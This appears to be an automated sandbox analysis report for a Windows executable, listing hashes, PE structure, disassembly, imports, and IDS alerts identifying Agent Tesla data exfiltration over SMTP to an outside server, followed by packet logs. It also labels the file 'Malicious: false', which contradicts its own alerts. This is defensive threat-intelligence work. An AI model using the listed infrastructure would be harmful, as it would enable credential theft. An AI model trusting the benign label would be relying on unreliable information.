SHA-512: | 8E407290AC877E2AE5291EBB22EB6291DEBFE0C3F4CDD688379BF0F57C639D1B19840454386EA9A6ABE9A0B91FD46D174FD6FCBC09D8AF93835CE550EFF74471 |
Malicious: | false |
File type: | |
Entropy (8bit): | 7.981646328069462 |
TrID: |
File name: | PI.1.exe |
File size: | 676'400 bytes |
MD5: | fc8b93107558429854146361da62e618 |
SHA1: | e4a2de78806dbc296ac97505f097e077e798ddf3 |
SHA256: | f27ddc5f225f50a392bfcf9cbd59557d445f5ad47f1ad31f1a899aec1ec92611 |
SHA512: | f58ae25ddc3d5c7f4f88c7285f028a9f17b6ed0ddda40a8ddea937e9afa3377df5525b857b0a23bed1e31e377291c538896c0d931822dcb32c87ba60daaf7708 |
SSDEEP: | 12288:iq3hN3sqXCPo54Ca4BpOrQhH1CRjU0u3FZWTzge:phFslgmKpOEVCq0cszge |
TLSH: | 97E4238CE3ADDD13E207473255B2EEF7B07A6A51196E090BA7102F6ABC607C0DC95E71 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@ |
Icon Hash: | 3d2e0f95332b3399 |
Entrypoint: | 0x40326a |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57956391 [Mon Jul 25 00:55:45 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e2a592076b17ef8bfb48b7e03965a3fc |
Signature Valid: | false |
Signature Issuer: | E=Lymphangioendothelioma@Untarnishedness.Sv, O=Alexiss, OU="Dimmy Hillerdianer phleborrhage ", CN=Alexiss, L=Paris La Défense, S=Île-de-France, C=FR |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
Subject Chain |
Version: | 3 |
Thumbprint MD5: | D4F02815E92198CFC1127FF5CBECA3BD |
Thumbprint SHA-1: | C164215ED66E5A63F0BDF2D6CAFE589387478411 |
Thumbprint SHA-256: | 2C9F994CD877953391BFEAE1978421BAA742729F4DE676B95D43C6999535E589 |
Serial: | 03D06D353419D1698E4B5F16798A7C3696FD6104 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 004092E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004070B0h] |
call dword ptr [004070ACh] |
cmp ax, 00000006h |
je 00007F961D46B713h |
push ebx |
call 00007F961D46E854h |
cmp eax, ebx |
je 00007F961D46B709h |
push 00000C00h |
call eax |
mov esi, 004072B8h |
push esi |
call 00007F961D46E7CEh |
push esi |
call dword ptr [0040715Ch] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F961D46B6ECh |
push ebp |
push 00000009h |
call 00007F961D46E826h |
push 00000007h |
call 00007F961D46E81Fh |
mov dword ptr [00429204h], eax |
call dword ptr [0040703Ch] |
push ebx |
call dword ptr [004072A4h] |
mov dword ptr [004292B8h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 004206A8h |
call dword ptr [00407188h] |
push 004092C8h |
push 00428200h |
call 00007F961D46E408h |
call dword ptr [004070A8h] |
mov ebp, 00434000h |
push eax |
push ebp |
call 00007F961D46E3F6h |
push ebx |
call dword ptr [00407174h] |
add word ptr [eax], 0000h |
Programming Language: |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7504 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4b000 | 0xd30 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa3968 | 0x18c8 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5ff9 | 0x6000 | 34f0469eb860d5ecf0e52ef9d3820a60 | False | 0.6667073567708334 | data | 6.4734859396670705 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x13a4 | 0x1400 | 848ecd58951d0a4cfe8ec8cfce6b20d1 | False | 0.452734375 | data | 5.125569346027248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x202f8 | 0x600 | 3953dbb7217e7539ee75e90871f7aef9 | False | 0.4947916666666667 | data | 3.9050018847265378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2a000 | 0x21000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x4b000 | 0xd30 | 0xe00 | e46d56b3a01f6ccd2462e77a7b696dee | False | 0.42578125 | data | 4.247954142797999 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x4b208 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894 |
RT_DIALOG | 0x4b4f0 | 0x120 | data | English | United States | 0.5138888888888888 |
RT_DIALOG | 0x4b610 | 0xf8 | data | English | United States | 0.6330645161290323 |
RT_DIALOG | 0x4b708 | 0xa0 | data | English | United States | 0.6125 |
RT_DIALOG | 0x4b7a8 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x4b808 | 0x14 | data | English | United States | 1.2 |
RT_VERSION | 0x4b820 | 0x1d0 | data | English | United States | 0.5474137931034483 |
RT_MANIFEST | 0x4b9f0 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153 |
DLL | Import |
---|---|
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States | |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
03/18/24-14:31:09.862635 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
03/18/24-14:31:09.862635 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
03/18/24-14:31:09.862635 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
03/18/24-14:31:09.862549 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 18, 2024 14:30:57.266913891 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.266952038 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.267021894 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.278402090 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.278417110 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.596740007 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.596909046 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.693818092 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.693835974 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.694147110 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.694210052 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.698870897 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.740240097 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.900914907 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.900943041 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.901031971 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:57.901047945 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:57.901094913 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.058695078 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.058746099 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.058835030 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.058850050 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.058887959 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.058914900 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.141953945 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.142085075 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.212632895 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.212717056 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.213152885 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.213226080 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.213779926 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.213843107 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.214209080 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.214273930 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.370575905 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.370660067 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402682066 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402739048 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402772903 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402786970 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402795076 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402808905 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402839899 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402848959 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402913094 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.402941942 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.402949095 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.403023958 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.403033972 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.403059959 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.403064966 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.403112888 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.403162003 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.673203945 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673279047 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673325062 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673461914 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.673484087 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.673531055 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.675894976 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.675976992 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676064014 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676111937 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676130056 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676134109 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676155090 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676166058 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676196098 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676199913 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676208973 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676249981 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676274061 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676318884 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676335096 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676338911 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676359892 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676368952 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676386118 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676393986 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676424026 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:58.676450014 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676481009 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676851034 CET | 49715 | 443 | 192.168.2.11 | 104.128.228.214 |
Mar 18, 2024 14:30:58.676862955 CET | 443 | 49715 | 104.128.228.214 | 192.168.2.11 |
Mar 18, 2024 14:30:59.257819891 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.257862091 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.257941961 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.261018991 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.261032104 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.451380968 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.451467991 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.453665972 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.453674078 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.453906059 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.457915068 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.504237890 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.721412897 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.721471071 CET | 443 | 49716 | 104.26.13.205 | 192.168.2.11 |
Mar 18, 2024 14:30:59.721544981 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:30:59.726278067 CET | 49716 | 443 | 192.168.2.11 | 104.26.13.205 |
Mar 18, 2024 14:31:04.246793032 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:05.257479906 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:05.487135887 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:05.487293005 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:05.876562119 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:05.876825094 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.106491089 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.107126951 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.337042093 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.337366104 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.585319996 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.585750103 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:06.815315008 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:06.815548897 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.064551115 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.064724922 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.294112921 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.294204950 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.294970036 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295172930 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295257092 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295336962 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295394897 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295444012 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.295506954 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.524666071 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.524687052 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.524698973 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.546400070 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:07.601195097 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.645462990 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:07.915066004 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.076515913 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.076646090 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.076700926 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.078820944 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.297899961 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.298130989 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.306317091 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.522958994 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.523412943 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.742866039 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.743076086 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:08.962687969 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:08.966187000 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.194453001 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.194699049 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.413757086 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.413950920 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.642729998 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.642939091 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862123966 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.862199068 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:09.862469912 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862549067 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862634897 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862687111 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862756014 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862816095 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862864017 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862905025 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862941027 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:09.862977982 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Mar 18, 2024 14:31:10.082042933 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.082087040 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.082098007 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.082110882 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.118055105 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 |
Mar 18, 2024 14:31:10.163692951 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 18, 2024 14:30:57.144936085 CET | 49740 | 53 | 192.168.2.11 | 1.1.1.1 |
